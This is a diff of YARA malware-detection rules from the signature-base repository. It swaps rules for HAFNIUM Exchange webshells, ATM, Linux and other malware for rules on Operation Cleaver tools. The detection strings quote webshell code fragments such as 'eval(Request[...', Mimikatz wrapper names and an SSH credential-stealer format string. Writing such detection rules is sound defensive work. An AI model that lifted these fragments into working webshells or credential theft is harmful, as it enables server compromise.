-		id = "9336bd2c-791c-5c3e-9733-724a6a23864a"
-		date = "2021-03-05"
-		modified = "2021-03-12"
-		reference = "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L275-L295"
+		description = "Tiny Bot used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "4fad21a6-a900-5afb-876d-99a6d93e0c2c"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L117-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d2e5f91f7bb50984c491eb9632d3863febc986760e4d03c8255872887ce4dc4a"
-		score = 75
-		quality = 56
-		tags = "FILE"
+		logic_hash = "fdc41fbec71602e13105a03a4f44319a139018bda00e87e8f4d9b5e2f6269c14"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = /App_Web_[a-zA-Z0-9]{7,8}.dll/ ascii wide fullword
-		$a1 = "~/aspnet_client/" ascii wide nocase
-		$a2 = "~/auth/" ascii wide nocase
-		$b1 = "JScriptEvaluate" ascii wide fullword
-		$c1 = "get_Request" ascii wide fullword
-		$c2 = "get_Files" ascii wide fullword
-		$c3 = "get_Count" ascii wide fullword
-		$c4 = "get_Item" ascii wide fullword
-		$c5 = "get_Server" ascii wide fullword
+		$s1 = "NetScp" wide
+		$s2 = "TinyZBot.Properties.Resources.resources"
+		$s3 = "Aoao WaterMark"
+		$s4 = "Run_a_exe"
+		$s5 = "netscp.exe"
+		$s6 = "get_MainModule_WebReference_DefaultWS"
+		$s7 = "remove_CheckFileMD5Completed"
+		$s8 = "http://tempuri.org/"
+		$s9 = "Zhoupin_Cleaver"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 5KB and filesize < 40KB and all of ( $x* ) and 1 of ( $a* ) and ( all of ( $b* ) or all of ( $c* ) )
+		(( $s1 and $s2 ) or ( $s3 and $s4 and $s5 ) or ( $s6 and $s7 and $s8 ) or $s9 )
 }
-rule SIGNATURE_BASE_APT_MAL_ASP_DLL_HAFNIUM_Mar21_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Zhoupinexploitcrew
 {
 	meta:
-		description = "Detects HAFNIUM compiled ASP.NET DLLs dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "68b8252e-a07d-5507-b556-a4d473f98157"
-		date = "2021-03-05"
+		description = "Keywords used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "4e7457a0-e6e1-535c-b04b-ad313b496ce1"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L297-L325"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L140-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4a3f9c7029e67647823a13079655b24648f5e4a7e238439b7a933b19477c20c"
-		score = 65
+		logic_hash = "1541f1ebc026d3eaf9b62150085415d12523ee1395fb8cf7ade8608a1b0a11b6"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "097f5f700c000a13b91855beb61a931d34fb0abb738a110368f525e25c5bc738"
-		hash2 = "15744e767cbaa9b37ff7bb5c036dda9b653fc54fc9a96fe73fbd639150b3daa3"
-		hash3 = "52ae4de2e3f0ef7fe27c699cb60d41129a3acd4a62be60accc85d88c296e1ddb"
-		hash4 = "5f0480035ee23a12302c88be10e54bf3adbcf271a4bb1106d4975a28234d3af8"
-		hash5 = "6243fd2826c528ee329599153355fd00153dee611ca33ec17effcf00205a6e4e"
-		hash6 = "ebf6799bb86f0da2b05e66a0fe5a9b42df6dac848f4b951b2ed7b7a4866f19ef"
+		tags = ""
 
 	strings:
-		$s1 = "Page_Load" ascii fullword
-		$sc1 = { 20 00 3A 00 20 00 68 00 74 00 74 00 70 00 3A 00
-               2F 00 2F 00 (66|67) 00 2F 00 00 89 A3 0D 00 0A 00 }
-		$op1 = { 00 43 00 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f }
-		$op2 = { 58 00 77 00 30 00 4a 00 45 00 00 51 7e 00 2f 00 61 00 }
-		$op3 = { 01 0e 0e 05 20 01 01 11 79 04 07 01 12 2d 04 07 01 12 31 02 }
-		$op4 = { 5e 00 03 00 bc 22 00 00 00 00 01 00 85 03 2b 00 03 00 cc }
+		$s1 = "zhoupin exploit crew" nocase
+		$s2 = "zhopin exploit crew" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of ( $s* ) or all of ( $op* )
+		1 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Fileexplorer_Mar21_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Antivirusdetector
 {
 	meta:
-		description = "Detects Chopper like ASPX Webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "edcaa2a8-6fea-584e-90c2-307a2dfc9f7f"
-		date = "2021-03-31"
+		description = "Hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "25ab4eaf-eae7-5a55-bed4-42f621d5f06c"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L363-L397"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L156-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b4ffd222b38e76455fff2650b72bdcaff281323103f342b427013cd3fffdc21"
-		score = 80
+		logic_hash = "9a8c2bbd27efab4c5579ea143abbd2f71c477dfd0ddbfb1741359e4d34140d9b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75"
+		tags = ""
 
 	strings:
-		$x1 = "<span style=\"background-color: #778899; color: #fff; padding: 5px; cursor: pointer\" onclick=" ascii
-		$xc1 = { 3C 61 73 70 3A 48 69 64 64 65 6E 46 69 65 6C 64
-               20 72 75 6E 61 74 3D 22 73 65 72 76 65 72 22 20
-               49 44 3D 22 ?? ?? ?? ?? ?? 22 20 2F 3E 3C 62 72
-               20 2F 3E 3C 62 72 20 2F 3E 20 50 72 6F 63 65 73
-               73 20 4E 61 6D 65 3A 3C 61 73 70 3A 54 65 78 74
-               42 6F 78 20 49 44 3D }
-		$xc2 = { 22 3E 43 6F 6D 6D 61 6E 64 3C 2F 6C 61 62 65 6C
-               3E 3C 69 6E 70 75 74 20 69 64 3D 22 ?? ?? ?? ??
-               ?? 22 20 74 79 70 65 3D 22 72 61 64 69 6F 22 20
-               6E 61 6D 65 3D 22 74 61 62 73 22 3E 3C 6C 61 62
-               65 6C 20 66 6F 72 3D 22 ?? ?? ?? ?? ?? 22 3E 46
-               69 6C 65 20 45 78 70 6C 6F 72 65 72 3C 2F 6C 61
-               62 65 6C 3E 3C 25 2D 2D }
-		$r1 = "(Request.Form[" ascii
-		$s1 = ".Text + \" Created!\";" ascii
-		$s2 = "DriveInfo.GetDrives()" ascii
-		$s3 = "Encoding.UTF8.GetString(FromBase64String(str.Replace(" ascii
-		$s4 = "encodeURIComponent(btoa(String.fromCharCode.apply(null, new Uint8Array(bytes))));;"
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Chopper_Like_Mar21_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Csext
 {
 	meta:
-		description = "Detects Chopper like ASPX Webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a4dc1880-865f-5e20-89a2-3a642c453ef9"
-		date = "2021-03-31"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "f865eae5-9988-5533-a004-e1694761a557"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L399-L416"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L173-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "baa9eb1e3c4ac5ce49d27b1c3f75c8b6590567e25d98761a8b704478f2cee970"
-		score = 85
+		logic_hash = "b4d070b71b685608ab84e757d01293749f2c017a6cd5b6ade6591264adc9836b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "ac44513e5ef93d8cbc17219350682c2246af6d5eb85c1b4302141d94c3b06c90"
+		tags = ""
 
 	strings:
-		$s1 = "http://f/<script language=\"JScript\" runat=\"server\">var _0x" ascii
-		$s2 = "));function Page_Load(){var _0x" ascii
-		$s3 = ";eval(Request[_0x" ascii
-		$s4 = "','orange','unsafe','" ascii
+		$s1 = "COM+ System Extentions"
+		$s2 = "csext.exe"
+		$s3 = "COM_Extentions_bin"
 
 	condition:
-		filesize < 3KB and 1 of them or 2 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Silence_Malware_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Kagent
 {
 	meta:
-		description = "Detects malware sample mentioned in the Silence report on Securelist"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f932e3fe-a2d7-55b7-b581-88c0ed45723e"
-		date = "2017-11-01"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "32d20495-eeed-5b2b-915d-cad60fa991f6"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/the-silence/83009/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_silence.yar#L13-L38"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L190-L204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b88795268c080fe19f7e185d1542b520616fe6c00bae23a99981aa1ee8abacb3"
-		score = 75
+		logic_hash = "bd72ade7d40db830dc980def5107261f9cb41b713f9a0a1b2f41f7658b31653e"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f24b160e9e9d02b8e31524b8a0b30e7cdc66dd085e24e4c58240e4c4b6ec0ac2"
+		tags = ""
 
 	strings:
-		$x1 = "adobeudp.exe" fullword wide
-		$x2 = "%s\\adobeudp.exeZone.Identifier" fullword ascii
-		$x3 = "%s\\igfxpers_%08x.exe" fullword ascii
-		$x4 = "%s\\adobeudp.exe" fullword ascii
-		$s1 = "SoftWare\\MicroSoft\\Windows\\CurrentVersion\\Run" fullword ascii
-		$s2 = "Copyright (C)  1999 - 2017" fullword wide
-		$s3 = "%sget.php?name=%x" fullword ascii
-		$s4 = "VNASSRUNXYC" fullword wide
+		$s1 = "kill command is in last machine, going back"
+		$s2 = "message data length in B64: %d Bytes"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e03edb9bd7cbe200dc59f361db847f8a" or 1 of ( $x* ) or 3 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Silence_Malware_2 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Mimikatzwrapper
 {
 	meta:
-		description = "Detects malware sample mentioned in the Silence report on Securelist"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4c7d753-fd04-5e11-9960-1ad238039c11"
-		date = "2017-11-01"
+		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e9427e29-e581-5a5b-8f1d-4b9bfeec0946"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/the-silence/83009/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_silence.yar#L40-L64"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L206-L220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8cb6320eac984b7a332c1c84582a7ca7e90d409e518106c4e7655948f6863889"
-		score = 75
+		logic_hash = "c643e248a9d8dd653ec99f8b59cdc7af945857a6a0321f93cc6983e85f84baba"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27"
+		tags = ""
 
 	strings:
-		$x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii
-		$x2 = "\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}" fullword ascii
-		$s1 = "My Sample Service: ServiceMain: SetServiceStatus returned error" fullword ascii
-		$s2 = "\\mss.exe" ascii
-		$s3 = "\\out.dat" ascii
-		$s4 = "\\mss.txt" ascii
-		$s5 = "Default monitor" fullword ascii
+		$s1 = "mimikatzWrapper"
+		$s2 = "get_mimikatz"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "69f3ec173efb6fd3ab5f79e0f8051335" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 5 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_SUSP_ENV_Folder_Root_File_Jan23_1 : SCRIPT FILE
+rule SIGNATURE_BASE_OPCLEAVER_Pvz_In
 {
 	meta:
-		description = "Detects suspicious file path pointing to the root of a folder easily accessible via environment variables"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6067d822-5c1b-5b86-863c-fdcfa37da665"
-		date = "2023-01-11"
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "dede12b3-f1dd-58ba-a860-829b2331b740"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_indicators.yar#L3-L22"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L222-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5355ae567e6255e22f566bae9fe50f4995bafba07c261461d37d5b8ba200d33a"
+		logic_hash = "eae778162be5dcfa0005bb237c5209e7103db3549e06706744f9ebdf04e192df"
 		score = 70
-		quality = 58
-		tags = "SCRIPT, FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$xr1 = /%([Aa]pp[Dd]ata|APPDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$xr2 = /%([Pp]ublic|PUBLIC)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$xr4 = /%([Pp]rogram[Dd]ata|PROGRAMDATA)%\\[A-Za-z0-9_\-]{1,20}\.[a-zA-Z0-9]{1,4}[^\\]/ wide ascii
-		$fp1 = "perl -MCPAN " ascii
-		$fp2 = "CCleaner" ascii
+		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
+		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
 
 	condition:
-		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* ) and not pe.number_of_signatures > 0
+		all of them
 }
-rule SIGNATURE_BASE_ATM_Malware_XFSADM_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Pvz_Out
 {
 	meta:
-		description = "Detects ATM Malware XFSADM"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "7bd7e194-1cf1-5d12-809b-25aaf7f62ca3"
-		date = "2019-06-21"
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "46b51bff-dfd9-5f56-897c-422112bc837b"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1149043362244308992"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_xfsadm.yar#L1-L23"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L238-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2c1761407c5e499be43e546badd27428821f828a470fd3e3dcddd08db04aaa5"
-		score = 75
+		logic_hash = "849300c32d2df42a011386903495d271810fd8a40c76d1a0c6295c059deb3a05"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "2740bd2b7aa0eaa8de2135dd710eb669d4c4c91d29eefbf54f1b81165ad2da4d"
+		tags = ""
 
 	strings:
-		$Code1 = {68 88 13 00 00 FF 35 ?? ?? ?? ?? 68 CF 00 00 00 50 FF 15}
-		$Code2 = {68 98 01 00 00 50 FF 15}
-		$Mutex = "myXFSADM" wide
-		$MSXFSDIR = "C:\\Windows\\System32\\msxfs.dll" ascii
-		$XFSCommand1 = "WfsExecute" ascii
-		$XFSCommand2 = "WfsGetInfo" ascii
-		$PDB = "C:\\Work64\\ADM\\XFS\\Release\\XFS.pdb" ascii
-		$WindowName = "XFS ADM" wide
-		$FindWindow = "ADM rec" wide
-		$LogFile = "xfs.log" ascii
-		$TmpFile = "~pipe.tmp" ascii
+		$s1 = "Network Connectivity Module" wide
+		$s2 = "OSPPSVC" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 500KB and ( 4 of them or $PDB )
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Wndtest
 {
 	meta:
-		description = "Kobalos malware"
-		author = "Marc-Etienne M.Leveille"
-		id = "dfa47e30-c093-57f6-af01-72a2534cc6f4"
-		date = "2020-11-02"
+		description = "Backdoor used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "f8daa0a8-f0f0-5bf7-b9ab-eaf5335ff2b9"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_kobalos.yar#L32-L57"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L254-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "48aec47b70633d4c8cb55d90a2e168f3c2027ef27cfe1cd5d30dcdc08a2ff717"
-		score = 75
+		logic_hash = "3b29c2b92b816bd0559695cb6b0b6e050ca8c5e256ec92448535fe9edf20757f"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
 
 	strings:
-		$encrypted_strings_sizes = {
-            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
-            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
-            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
-            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
-        }
-		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
-		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
-		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
+		$s1 = "[Alt]" wide
+		$s2 = "<< %s >>:" wide
+		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
 
 	condition:
-		uint16( 0 ) == 0x457f and any of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos_SSH_Credential_Stealer : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Zhcat
 {
 	meta:
-		description = "Kobalos SSH credential stealer seen in OpenSSH client"
-		author = "Marc-Etienne M.Leveille"
-		id = "0f923f92-c5d8-500d-9a2e-634ca7945c5c"
-		date = "2020-11-02"
+		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e1f1bc48-b895-5e23-8ffd-b6ea9c8eb26f"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_kobalos.yar#L59-L76"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L271-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdabaea0c838e43b8716bcd102bdeebf2f08fc041b0b909333e3d9d6f94391fc"
-		score = 75
+		logic_hash = "ef5112532ba62cb2cf6a1c62b344d9146c5b8e2da50990c8cfd60d91b99bcb5e"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
 
 	strings:
-		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
+		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+		$s2 = "ABC ( A Big Company )" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x457f and any of them
+		all of them
 }
-
-rule SIGNATURE_BASE_MAL_Neshta_Generic : HIGHVOL FILE
+rule SIGNATURE_BASE_OPCLEAVER_Zhlookup
 {
 	meta:
-		description = "Detects Neshta malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9a3b8369-7e19-5c21-9eba-0bb81507696a"
-		date = "2018-01-15"
-		modified = "2021-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_netsha.yar#L3-L36"
+		description = "Hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "45ef9a90-db4c-59c3-b694-da3f539b118b"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L287-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "acac6f81900c60a0aacea6345a7c03a0b77dd86d5ca7ca3d102668c49595bb6b"
-		score = 75
+		logic_hash = "9cc476e016708fd1604a63e2391057dc9dd0865448b62742ec596d6de54bf8f6"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
-		hash1 = "0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e"
-		hash2 = "b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb"
-		hash3 = "1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb"
-
-	strings:
-		$x1 = "the best. Fuck off all the rest."
-		$x2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
-		$s1 = "Neshta" ascii fullword
-		$s2 = "Made in Belarus. " ascii fullword
-		$op1 = { 85 c0 93 0f 85 62 ff ff ff 5e 5b 89 ec 5d c2 04 }
-		$op2 = { e8 e5 f1 ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c }
-		$op3 = { eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 34 }
-		$sop1 = { e8 3c 2a ff ff b8 ff ff ff 7f eb 3e 83 7d 0c 00 }
-		$sop2 = { 2b c7 50 e8 a4 40 ff ff ff b6 88 }
+		tags = ""
+
+	strings:
+		$s1 = "zhLookUp.Properties"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or all of ( $s* ) or 3 of them or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" )
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Buckeye_Osinfo : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Zhmimikatz
 {
 	meta:
-		description = "Detects OSinfo tool used by the Buckeye APT group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e40a86d1-fd1a-5430-b7b7-8cc7ca128cc5"
-		date = "2016-09-05"
-		modified = "2025-03-19"
-		reference = "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L10-L29"
+		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "fba8ab6e-3b61-53a1-b4df-178442e3cf24"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L302-L316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "782ae4293db0839190a9533d2c45baff92527867bfcd048ccae82611f165601b"
+		logic_hash = "1d6ce5b3351d4b01abe0c2f614d002d4e96599b4bfa01138704a3fdf345d0786"
 		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "-s ShareInfo ShareDir" fullword ascii
-		$s2 = "-a Local And Global Group User Info" fullword ascii
-		$s3 = "-f <infile> //input server list from infile, OneServerOneLine" fullword ascii
-		$s4 = "info <\\server> <user>" fullword ascii
-		$s5 = "-c Connect Test" fullword ascii
-		$s6 = "-gd Group Domain Admins" fullword ascii
-		$s7 = "-n NetuseInfo" fullword ascii
+		$s1 = "MimikatzRunner"
+		$s2 = "zhmimikatz"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $s* )
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Remotecmd : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Parviz_Developer
 {
 	meta:
-		description = "Detects a remote access tool used by APT groups - file RemoteCmd.exe"
+		description = "Parviz developer known from Operation Cleaver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "384f37f3-4562-5d79-9793-0384c43d4602"
-		date = "2016-09-08"
-		modified = "2022-12-21"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_buckeye.yar#L31-L51"
+		id = "2bfa90a0-0495-5b21-98f7-5ed7ebc74b2d"
+		date = "2014-12-02"
+		modified = "2023-12-05"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L318-L332"
